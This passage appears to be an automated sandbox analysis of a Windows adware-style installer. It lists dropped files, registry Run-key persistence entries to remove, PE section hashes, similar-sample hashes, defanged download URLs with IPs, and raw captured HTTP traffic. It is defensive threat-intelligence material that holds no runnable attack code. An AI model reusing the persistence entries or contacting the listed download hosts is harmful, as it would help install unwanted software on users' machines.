%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[1].js (387 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[8].jpg (1977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[2].js (660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\home-v3[1].png (15800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[5].jpg (789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[1].js (1761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[2].js (817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\json2[1].js (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[2].js (2 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.fengyunzhibo[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[2].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\1pc[1].png (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[3].jpg (42 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[1].txt (1758 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.fengyunzhibo[1].txt (892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[5].jpg (2336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hyyy_ban[1].png (38404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\cover_bk[1].png (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CAEJCPMJ.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\artsicon_s[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\system[1].js (1561 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tv.aiqingzhihui[1].txt (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\banner_bk[1].png (2878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[1].js (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[2].jpg (3371 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"yyfm0529_2014081705" = "%Program Files%\yyfm0529\2014081705\yymusic05.exe -mini"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"yyfm0529_News_2014081705" = "%Program Files%\yyfm0529\2014081705\YFMSever.exe -mini"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe -stmd=3" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ${PRODUCT_NAME}
Product Version: 2014.07.27.150521
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: ${PRODUCT_NAME}Product Version: 2014.07.27.150521Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23488 | 23552 | 4.48909 | 7ebfade271f75cb4c180603ab653af42 |
.rdata | 28672 | 4496 | 4608 | 3.59139 | 9d6e96915262c9d1129a16fa0b02a19a |
.data | 36864 | 110456 | 1024 | 3.27356 | dbf10679c897d0edeee280fffdad552f |
.ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 188416 | 85928 | 86016 | 2.16541 | 7a3cef6cadf59571c6209964d6cb3669 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 22
368df8ed3d7141cc7ceffb26a2220d74
b7689ef7d3c4763c76a43221bfc6d0b9
c81fd7ef721e6c7a1f0203dde813d244
6ca00e4606c195020cd39b59358b36a4
3b0128153a6b94307ca762112e1439d2
e77107291973bca380acd284c9b0a503
da49e83d0dd978c365612224ee558f21
36ff06cf8a6a849d240584b5af5f02ed
d1439abfdf73e0edf0811ffa74e4fd49
d217ec6e342146f4a002f71f34db95c3
71492741cbef0abc94944bcf6cb49aab
65254cf883d5964ce96d5b8633c76ffd
0eca26def7e361c36194aca94c4e5dd3
54287af5e0e8a6efda423312017ce223
30a86dc2c4792eacd946e46e1960bc89
ca824e896166c1da44e2ee134cd552d0
cd8831c8413def45cac4b8e146b4f8d2
959aa7b2a0ed301db047fb37268d62f0
3c67cf4665617d0c117061f12e31c456
a94bdb6aac01bffc342c236c4734941d
91b87c94c11a3b03dc3202f2e8ce5ff8
644a849240ab75128e2cf0985ec99585
Network Activity
URLs
URL | IP |
---|---|
hxxp://yunbo.luopf.cn/app.txt | 61.160.251.6 |
hxxp://yunbo.luopf.cn/guagua_77150006814.zip | 61.160.251.6 |
hxxp://pxsw.n.shifen.com/ | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllw5/BDLogicUtils.dll | |
hxxp://swdownload.jomodns.com/sw-search-sp/client2/common/patch/19562458020/BDLogicUtils.dll | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllv5/BDMReport.dll | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/BDMReport.dll | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllv3/BDMReport.dll | |
hxxp://swdownload.jomodns.com/sw-search-shadu/client/dllv3/BDMReport.dll | |
hxxp://swdownload.jomodns.com/sw-search-sp/client2/common/patch/19035267599/BDMReport.dll | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllws/BDMNet.dll | |
hxxp://yunbo.luopf.cn/pczh_107_306.zip | 61.160.251.6 |
hxxp://sxsw.n.shifen.com/ | |
hxxp://admin.downloader.re63.cn/downcontainer/downLoadList.do | 122.226.104.80 |
hxxp://admin.downloader.re63.cn/downcontainer/downLoadForGuaGua.do?recid=77150006814 | 122.226.104.80 |
hxxp://swdownload.jomodns.com/sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll | |
hxxp://img001.com/tg_pic/1.png | 36.250.9.8 |
hxxp://admin.downloader.re63.cn/downloader/start?dlver=G1.0.0&pname=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid= | 122.226.104.80 |
hxxp://img001.com/tg_pic/2.png | 36.250.9.8 |
hxxp://img001.com/tg_pic/3.png | 36.250.9.8 |
hxxp://img001.com/tg_pic/4.png | 36.250.9.8 |
hxxp://img001.com/tg_pic/5.png | 36.250.9.8 |
hxxp://img001.com/tg_pic/mobo14-1-9.png | 36.250.9.8 |
hxxp://yunbo.luopf.cn/wwwww_3340.zip | 61.160.251.6 |
hxxp://c01.i06.arnic.hadns.net/0403/help1.html | |
hxxp://c01.i06.arnic.hadns.net/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go= | |
hxxp://sxcdn.kukuplay.com/support/mini/fyminiloader-min.js | |
hxxp://c.split.cnzz.com/stat.php?id=2701879&web_id=2701879 | |
hxxp://dft.nc.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null | |
hxxp://c.split.cnzz.com/core.php?web_id=2701879&t=z | |
hxxp://z10.cnzz.com/stat.htm?id=2701879&r=&lg=en-us&ntime=none&cnzz_eid=1584515375-1408242084-&showp=1276x846&t=&h=1&rnd=1072095621 | |
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=135011660 | |
hxxp://dft.nc.fengyunzhibo.com/ | |
hxxp://pcookie.split.cnzz.com/app.gif?&cna=pv92DG xUBsCAcGK9OdTDULL | |
hxxp://static.m0dlcdn.kukuplay.com/support/mini/fyminiloader-min.js | 183.203.15.245 |
hxxp://dlsw.baidu.com/sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll | 180.76.22.47 |
hxxp://dlsw.baidu.com/sw-search-sp/client2/common/patch/19035267599/BDMReport.dll | 180.76.22.47 |
hxxp://p.x.baidu.com/ | 123.125.65.152 |
hxxp://c.cnzz.com/core.php?web_id=2701879&t=z | 42.120.219.6 |
hxxp://dl1sw.baidu.com/client/dllws/BDMNet.dll | 8.37.234.10 |
hxxp://dlsw.baidu.com/sw-search-sp/client2/common/patch/19562458020/BDLogicUtils.dll | 180.76.22.47 |
hxxp://dl1sw.baidu.com/client/dllv5/BDMReport.dll | 8.37.234.10 |
hxxp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go= | 222.186.20.122 |
hxxp://dl1sw.baidu.com/client/dllw5/BDLogicUtils.dll | 8.37.234.10 |
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=135011660 | 42.120.219.171 |
hxxp://dl1sw.baidu.com/client/BDMReport.dll | 8.37.234.10 |
hxxp://s.x.baidu.com/ | 180.76.2.46 |
hxxp://dlsw.baidu.com/sw-search-shadu/client/dllv3/BDMReport.dll | 180.76.22.47 |
hxxp://update.aiqingzhihui.com/0403/help1.html | 218.76.217.140 |
hxxp://s6.cnzz.com/stat.php?id=2701879&web_id=2701879 | 1.99.192.15 |
hxxp://cj.guagua.cn/downloader/start?dlver=G1.0.0&pname=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid= | 122.226.104.80 |
hxxp://hzs17.cnzz.com/stat.htm?id=2701879&r=&lg=en-us&ntime=none&cnzz_eid=1584515375-1408242084-&showp=1276x846&t=&h=1&rnd=1072095621 | 42.156.140.23 |
hxxp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null | 1.99.192.17 |
hxxp://dl1sw.baidu.com/client/dllv3/BDMReport.dll | 8.37.234.10 |
dtrp.download.iyuntian.com | 123.125.65.150 |
pcookie.cnzz.com | 42.120.219.171 |
www.fengyunzhibo.com | 115.231.18.11 |
jp.download.iyuntian.com | 123.125.65.154 |
cfg.download.iyuntian.com | 123.125.65.132 |
res.download.iyuntian.com | 123.125.65.129 |
tk.download.iyuntian.com | 123.125.69.209 |
rc.download.iyuntian.com | 123.125.65.153 |
utk.download.iyuntian.com | 123.125.65.147 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=20316160-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:58 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 5688144<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127219<br>
Content-Range: bytes 20316160-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=983040-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>
Date: Mon, 28 Jul 2014 23:18:00 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 983040-1178447/1178448<br>
Content-Length: 195408<br>
Age: 1652554<br>
Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/common/patch/19035267599/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=1146880-<br>
Referer: hXXp://xf.baidu.com<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:32 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 60640<br>
Connection: close<br>
ETag: 30cbc602ada7cdfb0346038c05996d84<br>
Last-Modified: Wed, 30 Apr 2014 05:22:28 GMT<br>
Expires: Mon, 18 Aug 2014 14:59:38 GMT<br>
Age: 127254<br>
Content-Range: bytes 1146880-1207519/1207520<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DC8389F18378C004A7004B30F60323AD<br>
x-bs-request-id: MTAuNTcuMTIyLjM1OjgwODA6MjM1OTEyNDY2MzoyOC9KdWwvMjAxNCAyMjo1OTowNiA=<br>
x-bs-meta-crc32: 2965621797<br>
Content-MD5: 30cbc602ada7cdfb0346038c05996d84<br>
x-bs-client-ip: MTgwLjc2LjIyLjE3Mg==<br><pre>......................................................................<br>......................................................................<br>..........................................abcdefghijklmnopqrstuvwxyz..<br>....ABCDEFGHIJKLMNOPQRSTUVWXYZ........................................<br>......................................................................<br>......................................................................<br>...................................................... <br> .....................</pre></font><br><br
<font color="red">POST / HTTP/1.1<br>
Connection: Keep-Alive<br>
Content-Length: 68<br>
Content-Type: application/octet-stream<br>
Host: s.x.baidu.com<br>
Keep-Alive: timeout=600,max=1000<br>
<br>
...8........" 228f74ad8138cf3f6e758ac75971083b(.2.8.@.H.P.X.` ......</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: iYuntianSvr<br>
Content-Type: application/octet-stream<br>
Keep-Alive: timeout=30<br>
Connection: Keep-Alive<br>
Content-Length: 124<br><pre>...p........" 228f74ad8138cf3f6e758ac75971083b(.28.G.k...v $(F.Cj...:.<br>...59......\....3V.%..5..2.c..`.E=~.8.@.H.P.X.` ........</pre></font><br><br
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=20578304-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:03 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 5426000<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127224<br>
Content-Range: bytes 20578304-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 200 OK<br>
Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>
Date: Mon, 28 Jul 2014 23:18:00 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Content-Length: 1178448<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Age: 1652553<br>
Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">POST / HTTP/1.1<br>
Connection: Keep-Alive<br>
Content-Length: 77<br>
Content-Type: application/octet-stream<br>
Host: p.x.baidu.com<br>
Keep-Alive: timeout=600,max=1000<br>
<br>
...A........." 228f74ad8138cf3f6e758ac75971083b(.........2.8.@.H.P.X.` ......</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: iYuntianSvr<br>
Content-Type: application/octet-stream<br>
Keep-Alive: timeout=30<br>
Connection: Keep-Alive<br>
Content-Length: 133<br><pre>...y........." 228f74ad8138cf3f6e758ac75971083b(.........28.YxY..b`...<br>Ty..O..8T..6&...l.. ..l.......&.{.$...6....~E8.@.H.P.X.` ......</font><br>....</pre></font><br><br><font color="red">POST / HTTP/1.1<br>
Connection: Keep-Alive<br>
Content-Length: 157<br>
Content-Type: application/octet-stream<br>
Host: p.x.baidu.com<br>
Keep-Alive: timeout=600,max=1000<br>
<br>
...y........." 228f74ad8138cf3f6e758ac75971083b(.........28.YxY..b`...Ty..O..8T..6&...l.. ..l.......&.{.$...6....~E8.@.H.P.X.` ......t&......E.P...`.`k}.....</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: iYuntianSvr<br>
Content-Type: application/octet-stream<br>
Keep-Alive: timeout=30<br>
Connection: Keep-Alive<br>
Content-Length: 941<br><pre>...y........." 228f74ad8138cf3f6e758ac75971083b(.........28.YxY..b`...<br>Ty..O..8T..6&...l.. ..l.......&.{.$...6....~E8.@.H.P.X.` ...(...1}....<br>.z.l0.....~.T.@1.M..v...d.J.z.[8..!..R~p|...k...H...;.g...i..E........<br>.y.~o.Fj...(...~z......h>.V.].$w..J...tN5....s........k..0/..<./<br>.%......wflP.........}.c.9.9../\."/......t..D.9.iX.3M.9..@E[}Kw.7....G<br>S......y...x..].4,.......W._.?....3f)...v D.y;.......c._!9...Q.&..l...<br>.zQ....b.c.s-q.....a ..w.T...O.M7[Xj'{G.......1cm;........,-..8@\...7.<br>.nXr?8.z..%j...=/.Z[..u.z......\U.[R..........57.9...0.$....A.!.3..T..<br>..J=..T.y...)F...O.....{....#3}...\..[.T6......< ...&,..6:....{j..1<br>.....N..4.G..qM...Pm..Q.C.......D...]wP.'s..zq!..{....O,@h2...."...T.d<br>....G[..).,..F.5...<.}.yA...-S........@p..<*W.a5u..<B_.1f*...<br>..j....@...j.1(...................=......*/.d..;...atDe.7.[..9...Y.$.P<br>K`..G..S..U....Tp...:...J..DG.r...F.\S...fz)..1..2....'.]....u........<br>........AT.;.*......T\......2...=)....A......z.....</pre></font><br><br
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=950272-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 15:52:24 GMT<br>
Date: Sun, 10 Aug 2014 15:52:24 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 950272-1178447/1178448<br>
Content-Length: 228176<br>
Age: 556091<br>
Via: 1.0 sdytwt89:8104 (Cdn Cache Server V2.0), 1.0 tswt88:8080 (Cdn Cache Server V2.0), 1.0 jg11:51020 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre></pre></font><br><br
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=23199744-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:25 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 2804560<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127246<br>
Content-Range: bytes 23199744-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=851968-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 15:52:41 GMT<br>
Date: Sun, 10 Aug 2014 15:52:41 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 851968-1207519/1207520<br>
Content-Length: 355552<br>
Age: 556070<br>
Via: 1.0 sdytwt85:88 (Cdn Cache Server V2.0), 1.0 tswt79:80 (Cdn Cache Server V2.0), 1.0 shiben14:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMReport.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=22413312-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:20 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 3590992<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127241<br>
Content-Range: bytes 22413312-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=19529728-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:41 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 6474576<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127202<br>
Content-Range: bytes 19529728-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
